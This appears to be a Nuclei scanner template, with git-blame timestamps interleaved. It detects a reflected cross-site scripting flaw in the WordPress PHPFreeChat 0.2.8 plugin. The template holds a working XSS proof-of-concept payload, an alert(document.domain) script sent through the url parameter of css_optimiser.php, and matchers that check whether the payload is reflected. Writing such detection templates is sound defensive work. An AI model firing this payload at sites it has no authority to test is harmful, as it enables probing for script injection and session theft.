2021-07-11 06:19:01 +00:00
id : wp-phpfreechat-xss
info :
2022-09-23 17:53:08 +00:00
name : WordPress PHPFreeChat 0.2.8 - Cross-Site Scripting
2021-07-11 06:19:01 +00:00
author : daffainfo
2022-09-23 17:53:08 +00:00
severity : high
description : WordPress PHPFreeChat 0.2.8 plugin contains a cross-site scripting vulnerability via the url parameter. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-04-22 10:38:41 +00:00
reference :
2022-09-23 17:53:08 +00:00
- https://www.exploit-db.com/exploits/37485
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info
2022-09-23 17:53:08 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-09-23 18:06:19 +00:00
tags : xss,wp-plugin,edb,wordpress
2021-07-11 06:19:01 +00:00
requests :
- method : GET
path :
2021-07-19 06:11:40 +00:00
- '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-11 06:19:01 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-07-19 06:11:40 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-11 06:19:01 +00:00
part : body
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-23 17:53:08 +00:00
# Enhanced by mp on 2022/09/23